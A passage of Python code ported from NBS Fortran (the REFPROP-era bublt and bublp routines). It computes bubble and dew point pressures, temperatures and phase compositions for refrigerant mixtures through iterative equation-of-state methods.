ROUTINE\n\t\t# CALCULATES THE SATURATION PRESSURE, THE COMPOSITION OF THE OTHER\n\t\t# PHASE AND THE LIQUID AND VAPOR SPECifIC VOLUMES.\n\t\t#\n\t\t# INPUTS:\n\t\t# T - TEMPERATURE (K)\n\t\t# ONLY ONE OF: XL - LIQUID COMPOSITION (MOLE FRACTION)\n\t\t# OR: XV - VAPOR COMPOSITION (MOLE FRACTION)\n\t\t# LBUB - LOGICAL VARIABLE\n\t\t# if LBUB = True LIQUID COMPOSITION IS GIVEN (COMPUTE\n\t\t# BUBBLE POINT)\n\t\t# if LBUB = False VAPOR COMPOSITION IS GIVEN (COMPUTE\n\t\t# DEW POINT)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# XL OR XV - COMPOSITION OF CALCULATED PHASE\n\t\t# P - SATURATION PRESSURE (kPa)\n\t\t# VL - LIQUID VOLUME (M**3/ KG MOL)\n\t\t# VV - VAPOR VOLUME (M**3/KG MOL)\n\t\t# LCRIT - ERROR FLAG; if LCRIT = True THE INPUT TEMPERATURE\n\t\t# EXCEEDS THE CRITICAL TEMPERATURE OF THE MIXTURE AND\n\t\t# NO CALCULATIONS ARE DONE\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# VIT - ITERATION FOR SPECifIC VOLUME\n\t\t# PLIMIT - DETERMINES INITIAL BOUNDS ON PRESSURE AND VOLUME\n\t\t# espar - COMPUTATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t# GENERAL NOMENCLATURE FOR FIRST LETTER OF VARIABLE NAMES\n\t\t# A,B - EQUATION OF STATE PARAMETERS\n\t\t# BData.F - MIXING PARAMETER\n\t\t# T - TEMPERATURE\n\t\t# P - PRESSURE\n\t\t# V - SPECifIC VOLUME\n\t\t# X - COMPOSITION\n\t\t# gibbs - GIBBS FREE ENERGY\n\t\t# U - CHEMICAL POTENTIAL\n\t\t# Y - COMBINATION OF VARIABLES USED IN EQUATION OF STATE\n\t\t# TOL - CONVERGENCE TOLERANCE FOR ITERATION LOOPS\n\t\t# I,J - INDEX VARIABLES FOR ITERATION AND DO LOOPS\n\t\t# L - LOGICAL VARIABLES SUCH AS NON - CONVERGENCE FLAGS\n\t\t#\n\t\t# GENERAL NOMENCLATURE FOR SECOND OR THIRD LETTER OF VARIABLES\n\t\t# L - LIQUID PHASE\n\t\t# V - VAPOR PHASE\n\t\t# 1 - PARENT PHASE (PHASE WITH SPECifIED COMPOSITION)\n\t\t# 2 - INCIPIENT PHASE\n\t\t#\n\t\t#\n\t\t#IMPLICIT REAL (A - H,O - Z)\n\t\t#LOGICAL LBUB,LCRIT,LV1CON,LV2CON,LXCON,LXPOS,LXNEG,LPPOS,LPNEG,LPPCON\n\t\t#COMMON / NCOMP / BData.NC\n\t\t#COMMON / ESPAR1 / BData.AP(5),BData.BP(5),BData.F(5,5),BData.DADT,BData.DBDT,BData.D2ADT,D2BDT\n\t\t#COMMON / RDATA4 / R\n\t\t#COMMON / TOL / TOLR,ITMAX,LUP\n\t\t\n\t\tPP = [0.0] * (3 + 1)\t#PP(3),FP(2),XL(5),XV(5)\n\t\tFP = [0.0] * (2 + 1)\n\t\t#input XL = [0.0] * (5 + 1)\n\t\t#input XV = [0.0] * (5 + 1)\n\n\t\tX1 = [0.0] * (5 + 1)\t# X1(5),X2(5),X2C(5),XX2(5)\n\t\tX2 = [0.0] * (5 + 1)\n\t\tX2C = [0.0] * (5 + 1)\n\t\tXX2 = [0.0] * (5 + 1)\n\n\t\tZ = [0.0] * (5 + 1)\t# Z(5),FX2(5),U1(5),U2(5),PL(3)\n\t\tFX2 = [0.0] * (5 + 1)\n\t\tU1 = [0.0] * (5 + 1)\n\t\tU2 = [0.0] * (5 + 1)\n\t\tPL = [0.0] * (3 + 1)\n\t\t\n\t\tLCRIT = False\n\t\t\n\t\t#\n\t\t# COMPUTE PURE COMPONENT E.S. COEFFICIENTS, THE MIXING PARAMETER,\n\t\t# AND THE E.S. COEFFICIENTS FOR PHASE 1\n\t\t\n\t\tif LBUB:\n\t\t\tX1 = XL[:]\n\t\t\tXV = XL[:]\n\t\t\t#for I in range(1,BData.NC + 1):\n\t\t\t#\tX1[I] = XL[I]\n\t\t\t#\tXV[I] = XL[I]\n\t\telse:\n\t\t\tX1 = XV[:]\n\t\t\tXL = XV[:]\t\t\n\t\t\t#for I in range(1,BData.NC + 1):\n\t\t\t#\tX1[I] = XV[I]\n\t\t\t#\tXL[I] = XV[I]\n\n\t\t[A1, B1] = self.espar (0,T,X1)\t#CALL espar ((0,T,X1,A1,B1)\n\t\t\n\t\t#\n\t\t# DETERMINE if INPUT TEMPERATURE EXCEEDS CRITICAL POINT;\n\t\t# if SO, SET ERROR FLAG AND RETURN\n\t\t#\n\t\tloc_TC = A1 / (B1 * 4.398909 * BData.R)\n\t\n\t\tif T > 0.99 * loc_TC :\n\t\t\tLCRIT = True\n\t\t\tprint ('bublt : critical point of pure or pseudo - pure material exceeded in bublt')\n\t\t\tprint (' in python, bad entry data, input temperature is more than critical point')\n\t\t\tprint (' input temp=' + str(T) + \"K Critical point (with the giiven X) \" + str(.099*loc_TC) + \" K\")\n\t\t\tprint (' input X ' , X1)\n\t\t\tprint ('Application terminated in python\\n')\n\t\t\tsys.exit('1000')\n\t\t\treturn [XL, XV, 0.0, 0.0, 0.0, LCRIT]\n\n\t\t#\n\t\t# ENTER ITERATION FOR PSEUDO - PURE COMPONENT. THIS ITERATION\n\t\t# YIELDS THE FINAL RESULT FOR A PURE COMPONENT AND PROVIDES\n\t\t# A STARTING GUESS FOR THE PRESSURE OF A MIXTURE\n\t\t#\n\t\t# CALL SUBROUTINE TO DETERMINE THE UPPER AND LOWER BOUNDS\n\t\t# ON PRESSURE FOR WHICH THERE ARE BOTH LIQUID AND VAPOR\n\t\t# SOLUTIONS OF THE EQUATION OF STATE\n\t\t#\n\n\t\t[VLOW, VUP, PLOW, PUP] = self.plimit (T,A1,B1)\n\n\t\t# SET INITIAL GUESSES FOR PRESSURE NEAR THE UPPER AND\n\t\t# LOWER BOUNDS. if THE LOWER BOUND FOR PRESSURE IS NEGATIVE\n\t\t# RESET IT TO A SMALL POSITIVE VALUE.\n\n\t\tif PLOW <= 0.0:\n\t\t\tVLOW = 0.8 * B1\n\t\t\tPC = 0.1049995 * BData.R * loc_TC / B1\n\t\t\tPLOW = (1.0E-12) * PC\n\t\t\tPP[1] = PLOW\n\t\telse:\n\t\t\tPP[1] = PLOW + 0.0001 * (PUP - PLOW)\n\n\t\tPP[2] = PUP - 0.0001 * (PUP - PLOW)\n\t\tPL[1] = math.log(PP[1])\n\t\tPL[2] = math.log(PP[2])\n\t\t\n\t\tVL = 0.9 * VLOW\n\t\tVV = 1.1 * VUP\n\t\tJ = 1\n\n\t\tLPPOS = False\n\t\tLPNEG = False\n\t\t#LPPCON = False # modifed in Python, work arounf Fortran Goto\n\t\tLPPCON = True \n\n\t\t#\n\t\t# STARTING WITH INITIAL VALUES OF PRESSURE CLOSE TO THE UPPER\n\t\t# AND LOWER BOUNDS (FOUND BY SUBROUTINE PLIMIT) ITERATE ON\n\t\t# LOG (P) UNTIL THE GIBBS FREE ENERGY OF BOTH PHASES ARE EQUAL.\n\t\t# A COMBINATION OF SECANT AND REGULI - FALSI METHODS IS USED\n\t\t# FOR THE ITERATION.\n\t\t\n\t\tPNEG = 0.0 # In Python \n\t\tfor IT in range (1, BData.ITMAX + 1):\t#DO 400 IT = 1,ITMAX\n\t\t\tLV1CON = False\n\t\t\tLV2CON = False\n\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[VL, LV1CON] = self.vit (T, PP[J], A1, B1, VL, True) \t\t# CALL VIT (T, PP[J], A1, B1, VL, True, LV1CON)\n\t\t\t[VV, LV2CON] = self.vit (T, PP[J], A1, B1, VV, False)\t\t# CALL VIT (T, PP[J], A1, B1, VV, False, LV2CON)\n\n\t\t\tGL = self.gibbs(T, VL, A1, B1)\n\t\t\tGV = self.gibbs(T, VV, A1, B1)\n\t\t\tFP [J] = GL - GV\n\n\t\t\tif FP[J] < 0.0:\n\t\t\t\tLPNEG = True\n\t\t\t\tFPNEG = FP[J]\n\t\t\t\tPNEG = PL[J]\n\t\t\t\tPPOS = 0.0 # in python only\n\t\t\telse:\n\t\t\t\tLPPOS = True\n\t\t\t\tFPPOS = FP[J]\n\t\t\t\tPPOS = PL[J]\n\n\t\t\tif IT <= 1 :\n\t\t\t\tJ = 2\n\t\t\telse:\n\t\t\t\tDGDPL = (FP[2] - FP[1]) / (PL[2] - PL[1])\n\t\t\t\tif (DGDPL == 0.0) or \\\n\t\t\t\t\t(abs(FP[J] / (PL[J] * DGDPL)) < BData.TOLR):\t#GOTO 440\n\t\t\t\t\t#Python modification\n\t\t\t\t\tLPPCON = False\n\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t# NEXT GUESS FOR LOG (P) GIVEN BY SECANT METHOD\n\t\t\t\tPL[3] = PL[2] - FP[2] / DGDPL\n\t\t\t\t\t\n\t\t\t\t# IF NEXT GUESS FOR LOG (P) IS FURTHER FROM SOLUTION THAN\n\t\t\t\t# PREVIOUS BEST GUESS, USE REGULI - FALSI METHOD FOR NEXT GUESS\n\t\t\t\tif ( ( PL[3] > max(PNEG, PPOS) \\\n\t\t\t\t\tor \tPL[3] < min(PNEG, PPOS) ) and LPNEG and LPPOS ) :\n\n\t\t\t\t\tPL[3] = PPOS - FPPOS * (PPOS - PNEG) / (FPPOS - FPNEG)\n\n\t\t\t\tPL[1] = PL[2]\n\t\t\t\tPL[2] = PL[3]\n\t\t\t\tFP[1] = FP[2]\n\t\t\t\tPP[2] = math.exp(PL[2])\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t# 400 CONTINUE\n\t\t\t\n\t\t\t# Delete this comment if ITERATION HAS NOT CONVERGED, SET ERROR FLAG.\n\t\t\t# ----deleted by python editorLPPCON = 1\t#True\n\t\t\t\n\t\t\t#\n\t\t\t# END OF PSEUDO - PURE COMPONENT ITERATION\n\t\t\t#\n\t\t\t# FOR A PURE COMPONENT THE ABOVE ITERATION GIVES THE FINAL RESULT\n\t\t\t#\t\n\t\tif BData.NC == 1:\t# 440 if (BData.NC == 1) :\n\t\t\tif LV1CON : print (BData.LUP,'bublt :volume iteration for parent phase did not converge')\n\t\t\tif LV2CON : print (BData.LUP,'bublt :volume iteration for incipient phase did not converge')\n\t\t\tif LPPCON : print (BData.LUP,'bublt :pure material pressure iteration in bublt did not converge')\n\t\t\tP = PP[J]\n\t\t\treturn [XL, XV, P, VL, VV, LCRIT]\n\t\t#\n\t\t# ENTER ITERATION FOR MIXTURE\n\t\t#\n\t\t# THE MIXTURE ITERATION CONSISTS OF TWO CONCENTRIC ITERATION\n\t\t# LOOPS WHICH VARY THE SATURATION PRESSURE OF THE MIXTURE AND THE\n\t\t# COMPOSITION OF THE COMPUTED PHASE TO GIVE EQUAL CHEMICAL\n\t\t# POTENTIALS FOR EACH OF THE COMPONENTS BETWEEN THE TWO PHASES.\n\t\t# THE INITIAL GUESS FOR THE PRESSURE IS GIVEN BY THE PSEUDO - PURE\n\t\t# ITERATION ABOVE; THE INITIAL GUESS FOR COMPOSITION IS THAT X2 = X1.\n\t\t#\n\t\t# ASSIGN INITIAL VALUES OF LIQUID AND VAPOR VOLUMES FROM ABOVE\n\t\t# ITERATION TO PHASE 1 AND 2 VOLUMES.\n\t\t#\n\t\tif LBUB :\n\t\t\tV1 = VL\n\t\t\tV2 = VV\n\t\telse:\n\t\t\tV1 = VV\n\t\t\tV2 = VL\n\n\t\tPP[1] = PP[J]\n\n\t\t#\n\t\t# BEGIN ITERATION FOR SATURATION PRESSURE OF MIXTURE\n\t\t#\n\t\tJ = 1\n\t\tX2C = X1[:]\n\t\t#for I in range(1, BData.NC +1):\t# DO 500 I = 1,BData.NC\n\t\t#\tX2C[I] = X1[I]\n\n\t\tLPNEG = False\n\t\tLPPOS = False\n\t\t\n\t\tb_pyth_exit_inner = False\n\t\tfor ITP in range (1, BData.ITMAX + 1): # DO 800 ITP = 1,ITMAX\n\t\t\tXX2 = X2C[:]\n\t\t\t#for I in range (1, BData.NC + 1): # DO 520 I = 1,BData.NC\n\t\t\t#\tXX2[I] = X2C[I]\n\n\t\t\tLXCON = False\n\t\t\tLV1CON = False\n\t\t\t\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[V1, LV1CON] = self.vit (T,PP[J],A1,B1,V1,LBUB)\t#CALL VIT (T,PP(J),A1,B1,V1,LBUB,LV1CON)\n\n\t\t\t#\n\t\t\t# if VOLUME ITERATION HAS NOT CONVERGED, TRY A NEW PRESSURE AND\n\t\t\t# RETURN TO THE BEGINNING OF THE ITERATION\n\t\t\t#\n\t\t\tif (LV1CON or LXCON) :\n\t\t\t\tPP[2] = 0.5 * (PP[1] + PP[2])\n\t\t\t\tbreak # GOTO 800\n\n\t\t\t# COMPUTE CHEMICAL POTENTIALS FOR PHASE 1\n\t\t\tfor I in range (1, BData.NC + 1): #DO 540 I = 1,BData.NC\n\t\t\t\tU1[I] = self.U_Func (T,X1,I,V1,A1,B1,BData.AP,BData.BP,BData.F)\n\n\t\t\t#\n\t\t\t# ENTER INNER ITERATION LOOP (FOR COMPOSITION OF PHASE 2)\n\t\t\t#\n\t\t\tLXNEG = False\n\t\t\tLXPOS = False\n\t\t\t\n\t\t\tC = 0.0 # prevent var is not found\n\t\t\tLXCON = True # add by python\n\t\t\tb_pyth_exit_outer = False\n\t\t\tfor IT in range (1, BData.ITMAX + 1):\t# DO 600 IT = 1,ITMAX\n\t\t\t\tLV2CON = False\n\n\t\t\t\t# COMPUTE EQUATION OF STATE COEFFICIENTS FOR PHASE 2\n\t\t\t\t\n\t\t\t\t[A2, B2] = self.espar (0,T,XX2) \t#CALL espar (0,T,XX2, A2, B2)\n\t\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t\t[V2, LV2CON] = self.vit (T,PP[J], A2, B2,V2, not LBUB)\t#CALL VIT (T,PP[J], A2, B2,V2,.NOT.LBUB,LV2CON)\n\n\t\t\t\t#\n\t\t\t\t# if VOLUME ITERATION HAS NOT CONVERGED, TRY A NEW PRESSURE\n\t\t\t\t# AND RETURN TO THE START OF THE PRESSURE ITERATION.\n\t\t\t\t#\n\t\t\t\tif LV2CON :\n\t\t\t\t\tPP[2] = 0.5 * (PP[1] + PP[2])\n\t\t\t\t\tb_pyth_exit_outer = True\n\t\t\t\t\tbreak\t# GOTO 800\n\n\t\t\t\t# COMPUTE CHEMICAL POTENTIALS OF PHASE 2\n\t\t\t\tfor I in range (1, BData.NC + 1): #DO 560 I = 1,BData.NC\n\t\t\t\t\tU2[I] = self.U_Func(T,XX2,I,V2, A2, B2,BData.AP,BData.BP,BData.F)\n\n\t\t\t\t#\n\t\t\t\t# CALCULATE THE COMPOSITION OF PHASE 2 FROM THE COMPOSITION\n\t\t\t\t# OF PHASE 1 AND THE CHEMICAL POTENTIALS. THE INNER ITERATION\n\t\t\t\t# LOOP HAS CONVERGED WHEN THE CALCULATED COMPOSITION EQUALS\n\t\t\t\t# (WITHIN A CONVERGENCE TOLERANCE) THE GUESSED VALUE OF X2.\n\t\t\t\t#\n\t\t\t\tFXSUM = 0.0\n\t\t\t\tC = 0.0\n\t\t\t\tfor I in range (1, BData.NC + 1): \t#DO 580 I = 1,BData.NC\n\t\t\t\t\tZ[I] = X1[I] * math.exp(U1[I] - U2[I])\n\t\t\t\t\tC = C + Z[I]\n\n\t\t\t\tfor I in range (1, BData.NC + 1): \t# DO 584 I = 1,BData.NC\n\t\t\t\t\tX2C[I] = Z[I] / C\n\t\t\t\t\tFX2[I] = X2C[I] - XX2[I]\n\t\t\t\t\tXX2[I] = X2C[I]\n\t\t\t\t\tFXSUM = FXSUM + abs(FX2[I])\n\t\t\t\t\n\t\t\t\tif (FXSUM < BData.NC * BData.TOLR) :\n\t\t\t\t\t# break is done exit 800 loop\n\t\t\t\t\tLXCON = False # add by python\n\t\t\t\t\tbreak\t#GOTO 640\n\t\t\t\t#End of loop ---- 600 CONTINUE\n\n\t\t\tif b_pyth_exit_outer: break\n\t\t\t# deleted by python editor LXCON = True\n\t\t\t#\n\t\t\t# END OF ITERATION LOOP FOR PHASE 2 COMPOSITION\n\t\t\t#\n\n\t\t\tFP[J] = 1.0 - C\t# Fortran location 640\n\n\t\t\t#\n\t\t\t# OUTER (PRESSURE) ITERATION HAS CONVERGED WHEN C = 1.000\n\t\t\t# (I.E. WHEN THE CHEMICAL POTENTIALS OF EACH COMPONENT ARE\n\t\t\t# THE SAME IN BOTH PHASES).\n\t\t\t#\n\n\t\t\tif (abs(FP[1]) < 100.0 * BData.TOLR):\n\t\t\t\tb_pyth_exit_inner = True\n\t\t\t\t# break is done exit 800 loop\n\t\t\t\tbreak\t#GOTO 840\n\n\t\t\t#\n\t\t\t# PROVIDED THAT THE X2 ITERATION HAS CONVERGED FOR THE CURRENT\n\t\t\t# GUESS OF PRESSURE, UPDATE THE POSITIVE AND NEGATIVE\n\t\t\t# BOUNDS FOR USE WITH THE REGULI - FALSI METHOD.\n\t\t\t#\n\t\t\tif not LXCON:\n\t\t\t\tif (FP[J] < 0.0):\n\t\t\t\t\tLPNEG = True\n\t\t\t\t\tFPNEG = FP[J]\n\t\t\t\t\tPNEG = PP[J]\n\t\t\t\telse:\n\t\t\t\t\tLPPOS = True\n\t\t\t\t\tFPPOS = FP[J]\n\t\t\t\t\tPPOS = PP[J]\n\n\t\t\t#\n\t\t\t# COMPUTE NEW GUESS FOR SATURATION PRESSURE.\n\t\t\t#\n\t\t\tif (ITP <= 2 or J == 1 or FP[1] == FP[2]) :\n\t\t\t\tPP[1] = PP[J]\n\t\t\t\tFP[1] = FP[J]\n\n\t\t\t\tif (LBUB) :\n\t\t\t\t\tPP[2] = PP[J] * C\n\t\t\t\telse :\n\t\t\t\t\tPP[2] = PP[J] / C\n\n\t\t\t\tJ = 2\n\t\t\telse :\n\t\t\t\tPP[3] = PP[2] - FP[2] * (PP[2] - PP[1]) / (FP[2] - FP[1])\n\n\t\t\t\tif ((PP[3] > max(PNEG,PPOS) or \\\n\t\t\t\t\t PP[3] < min(PNEG,PPOS) ) and LPNEG and LPPOS):\n\n\t\t\t\t\tPP[3] = PPOS - FPPOS * (PPOS - PNEG) / (FPPOS - FPNEG)\n\n\t\t\t\tPP[1] = PP[2]\n\t\t\t\tPP[2] = PP[3]\n\t\t\t\tFP[1] = FP[2]\n\t\t\t#- End of loop =========800 CONTINUE\n\t\t\n\t\t# location 800\n\t\tif not b_pyth_exit_inner:\n\t\t\tprint (BData.LUP, 'bublt : mixture pressure iteration in bublt did not converge')\n\n\t\tP = PP[J] # location 840\n\t\t#\n\t\t# ASSIGN RESULTS FOR PHASES 1 AND 2 TO LIQUID AND VAPOR PHASES\n\t\t# DEPENDING ON WHETHER THE DEW OR BUBBLE POINT WAS CALCULATED.\n\t\t#\n\t\tif (LBUB) :\n\t\t\t#for I in range (1, BData.NC + 1): # DO 860 I = 1,BData.NC\n\t\t\t#\tXV[I] = XX2[I]\n\t\t\tXV = XX2 [:]\n\t\t\tVL = V1\n\t\t\tVV = V2\n\t\telse :\n\t\t\t#for I in range (1, BData.NC + 1): # DO 880 I = 1,BData.NC\n\t\t\t#\tXL[I] = XX2[I]\n\t\t\tXL = XX2 [:]\n\t\t\tVL = V2\n\t\t\tVV = V1\n\n\t\t#\n\t\t# PRINT WARNING MESSAGES FOR ANY CASES OF NON - CONVERGENCE OCCURING\n\t\t# ON FINAL CALL TO EACH ITERATION AND RETURN.\n\t\t#\n\t\tif LV1CON : print (BData.LUP,'bublt : volume iteration for parent phase did not converge')\n\t\tif LV2CON : print (BData.LUP,'bublt : volume iteration for incipient phase did not converge')\n\t\tif LXCON : print (BData.LUP,'bublt : composition iteration in bublt did not converge')\n\n\t\treturn [ XL, XV, P, VL, VV, LCRIT] \n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef bublp (self, P, XL, XV, LBUB)\t:\t# T,VL,VV, LCRIT\n\t\t#\tSUBROUTINE BUBLP (P1, P2, P3, P4, P5, P6, P7, P8)\n\t\t# [P2, P3 ,P4, P5, P6, P8] = self.bublp (P1, P2, P3 , P7 )\n\t\t#\t SUBROUTINE BUBLP (P,XL,XV ,T,VL,VV, LBUB ,LCRIT)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS UNDER FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# GIVEN PRESSURE AND COMPOSITION OF ONE PHASE THIS ROUTINE\n\t\t# CALCULATES THE SATURATION TEMPERATURE, THE COMPOSITION OF THE OTHER\n\t\t# PHASE AND THE LIQUID AND VAPOR MOLAR VOLUMES.\n\t\t#\n\t\t# INPUTS:\n\t\t# P - SATURATION PRESSURE (KPA)\n\t\t# ONLY ONE OF: XL - LIQUID COMPOSITION (MOLE FRACTION)\n\t\t# OR: XV - VAPOR COMPOSITION (MOLE FRACTION)\n\t\t# LBUB - LOGICAL VARIABLE\n\t\t# if LBUB = True LIQUID COMPOSITION IS GIVEN (COMPUTE\n\t\t# BUBBLE POINT)\n\t\t# if LBUB = False VAPOR COMPOSITION IS GIVEN (COMPUTE\n\t\t# DEW POINT)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# XL OR XV - COMPOSITION OF CALCULATED PHASE\n\t\t# T - SATURATION TEMPERATURE (K)\n\t\t# VL - LIQUID VOLUME (M * * 3 / KMOL)\n\t\t# VV - VAPOR VOLUME (M * * 3 / KMOL)\n\t\t# LCRIT - ERROR FLAG; SET TO True WHEN THE INPUT PRESSURE\n\t\t# EXCEEDS THE CRITICAL PRESSURE.\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# VIT - ITERATION FOR MOLAR VOLUME\n\t\t# espar - COMPUTATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t# GENERAL NOMENCLATURE FOR FIRST LETTER OF VARIABLE NAMES\n\t\t# A,B - EQUATION OF STATE PARAMETERS\n\t\t# BData.F - MIXING PARAMETER\n\t\t# T - TEMPERATURE\n\t\t# P - PRESSURE\n\t\t# V - MOLAR VOLUME\n\t\t# X - COMPOSITION\n\t\t# G - GIBBS FREE ENERGY\n\t\t# U - CHEMICAL POTENTIAL\n\t\t# Y - COMBINATION OF VARIABLES USED IN EQUATION OF STATE\n\t\t# TOL - CONVERGENCE TOLERANCE FOR ITERATION LOOPS\n\t\t# I,J - INDEX VARIABLES FOR ITERATION AND DO LOOPS\n\t\t# L - LOGICAL VARIABLES SUCH AS NON - CONVERGENCE FLAGS\n\t\t#\n\t\t# GENERAL NOMENCLATURE FOR SECOND OR THIRD LETTER OF VARIABLES\n\t\t# A,B - COMPONENTS OF MIXTURE; COMPOSITION IS MOLE FRACTION BData.A\n\t\t# L - LIQUID PHASE\n\t\t# V - VAPOR PHASE\n\t\t# 1 - PARENT PHASE (PHASE WITH SPECifIED COMPOSITION)\n\t\t# 2 - INCIPIENT PHASE\n\t\t# (FOR EXAMPLE UA1 REFERS TO CHEMICAL POTENTIAL OF COMPONENT BData.A\n\t\t# IN PHASE 1)\n\t\t#\n\t\t#\t COMMON / ESPAR1 / BData.AP(5),BData.BP(5),BData.F(5,5),BData.DADT,BData.DBDT,BData.D2ADT,BData.D2BDT\n\t\t#\t COMMON / NCOMP / BData.NC\n\t\t#\t COMMON / RDATA4 / R\n\t\t#\t COMMON / TOL / TOLR,ITMAX,LUP\n\n\t\t# initialive basic vars\n\t\tLV1CON= False\n\t\tLV2CON= False\n\t\tLXCON = False\n\t\t\n\t\tLXPOS = False\n\t\tLXNEG = False\n\t\t\n\t\tLTPOS = False\n\t\tLTNEG = False\n\t\t\n\t\tLPPCON= False\n\t\tLCRIT = False\n\n\t\t# DIMENSION TT(3),FT(2)\n\t\tTT = [0.0] * (3+1)\n\t\tFT = [0.0] * (2+1)\n\t\t# DIMENSION XL(5),XV(5), X1(5),X2(5),X2C(5),XX2(5) ,Z(5),\n\t\t# FX2(5),U1(5),U2(5),UL(5),PL(5)\n\t\tX1 = [0.0] * (5+1)\n\t\tX2 = [0.0] * (5+1)\n\t\t\n\t\tX2C= [0.0] * (5+1)\n\t\tXX2= [0.0] * (5+1)\n\n\t\tZ = [0.0] * (5+1)\n\t\tFX2= [0.0] * (5+1)\n\t\tU1 = [0.0] * (5+1)\n\t\tU2 = [0.0] * (5+1)\n\t\tUL = [0.0] * (5+1)\n\t\tPL = [0.0] * (5+1)\n\n\t\tTC = 340.0\n\t\t# SAVE BData.TNEG,BData.TPOS set as Data vars\n\t\t#BData.TNEG = 9999.0\n\t\t#BData.TPOS = -999.0\n\n\t\t#\n\t\t# STATEMENT FUNCTIONS FOR GIBBS FREE ENERGY AND CHEMICAL POTENTIAL\n\t\t# NOTE THAT SINCE ONLY DIFFERENCES OF G AND U ARE USED IN THE PROGRAM\n\t\t# ANY TERMS WHICH WOULD CANCEL ARE OMITTED. \n\t\t# both g and u are divided by r * t to obtain dimensionless quantities.\n\t\t#\n\t\t\t\t\n\t\t# Python: this is the original function for gibbs, gives bad results\n\t\t#def G ( T,V,A,B):\n\t\t#\t# both G and U are divided by r * t to obtain dimensionless quantities.\n\t\t#\treturn - math.log(V) \n\t\t#\t+ 0.25 * B * ((8.0 * V - 2.25 * B) * V \t\\\n\t\t#\t+ 0.1875 * B * B) / ((V - 0.25*B)**2) / (V - 0.25 * B) \t\\\n\t\t#\t+ (A / B * math.log(V / (V + B)) \\\n\t\t#\t- A / (V + B) ) / (BData.R * T)\n\t\t\n\t\t\n\t\t#\n\t\t# COMPUTE PURE COMPONENT E.S. COEFFICIENTS, THE MIXING PARAMETER,\n\t\t# AND THE E.O.S. COEFFICIENTS FOR PHASE 1\n\t\t#\n\t\tif (LBUB) :\n\t\t\tX1 = XL [:]\n\t\t\tXV = XL [:]\n\t\t\t#for I in range(1, BData.NC + 1 ): # DO 100 I = 1,BData.NC\n\t\t\t#\tX1[I] = XL[I]\n\t\t\t#\tXV[I] = XL[I]\n\t\telse:\n\t\t\tX1 = XV [:]\n\t\t\tXL = XV [:]\n\t\t\t#for I in range(1, BData.NC + 1 ): # DO 120 I = 1,BData.NC\n\t\t\t#\tX1[I] = XV[I]\n\t\t\t#\tXL[I] = XV[I]\n\t\t#\n\t\t# FIND CRITICAL POINT OF THE PURE (OR PSEUDO - PURE) MATERIAL\n\t\t# AND BASE INITIAL GUESS FOR TEMPERATURE ON A SIMPLE, EMPIRICAL\n\t\t# RELATIONSHIP BETWEEN REDUCED PRESSURE AND REDUCED TEMPERATURE\n\t\t# THAT IS REASONABLY ACCURATE FOR REFRIGERANTS.\n\t\t#\n\t\tLCRIT = False\n\t\t[TC, PC, VC] = self.critx(X1,TC)\t#\tCALL CRITX (X1,TC,PC,VC)\n\t\t\n\t\tTT[1] = TC / (1.0 - 0.153 * math.log(P / PC))\n\n\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\n\t\t[A1, B1] = self.espar(0, TT[1], X1 ) #\tCALL espar (0,TT(1),X1,A1, B1)\n\t\t\n\t\tVL = 0.8 * B1\n\t\tVV = BData.R * TT[1] / P\n\t\t\n\t\t#\n\t\t# ENTER ITERATION FOR PURE COMPONENT. THIS ITERATION VARIES\n\t\t# TEMPERATURE UNTIL THE GIBBS FREE ENERGY OF BOTH PHASES ARE EQUAL.\n\t\t# A COMBINATION OF SECANT AND REGULI - FALSI METHODS IS USED\n\t\t# FOR THE ITERATION.\n\t\t#\n\t\tif (BData.NC == 1) :\n\t\t\tif (P > PC) :\n\t\t\t\tLCRIT = True\n\t\t\t\tprint (\"bublp: critical point of pure or pseudo-pure material\")\n\t\t\t\treturn [0.0, 0.0, 0.0, True]\n\n\t\t\tJ = 1\n\t\t\tLTPOS = False\n\t\t\tLTNEG = False\n\t\t\tLPPCON= False\n\t\t\t\n\t\t\tb_python_flag_loop1 = False\n\t\t\t\n\t\t\tfor IT in range( 1, BData.ITMAX + 1 ): # DO 400 IT = 1,ITMAX\n\t\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t\t[A1, B1] = self.espar(0, TT[J], X1 ) #\tCALL espar (0,TT(J),X1, A1, B1)\n\t\t\t\tLV1CON = False\n\t\t\t\tLV2CON = False\n\t\t\t\t\n\t\t\t\tif B1 <= 0:\n\t\t\t\t\tprint (\"bublp : bad input parameter for vit, B <= 0, B=\",B1)\n\t\t\t\t\tprint (\" input Temperature(K) =\", TT[J] )\n\t\t\t\t\tprint ('Application terminated in python\\n')\n\t\t\t\t\tsys.exit('1021')\n\t\t\t\t\t\n\t\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t\t[VL, LV1CON] = self.vit (TT[J], P, A1, B1, VL, True) \t#CALL VIT (TT(J), P, A1,B1, VL, True, LV1CON)\n\t\t\t\t[VV, LV2CON] = self.vit (TT[J], P, A1, B1, VV, False) \t#CALL VIT (TT(J), P, A1,B1, VV, False, LV2CON)\n\n\t\t\t\tGL = self.gibbs( TT[J], VL, A1, B1)\n\t\t\t\tGV = self.gibbs( TT[J], VV, A1, B1)\n\n\t\t\t\tFT[J] = GL - GV\n\n\t\t\t\tif (abs(FT[J]) < 100.0 * BData.TOLR):\n\t\t\t\t\tb_python_flag_loop1 = True\n\t\t\t\t\tbreak\t#\tGOTO 440\n\n\t\t\t\tif (FT[J] < 0.0) :\n\t\t\t\t\tLTNEG = 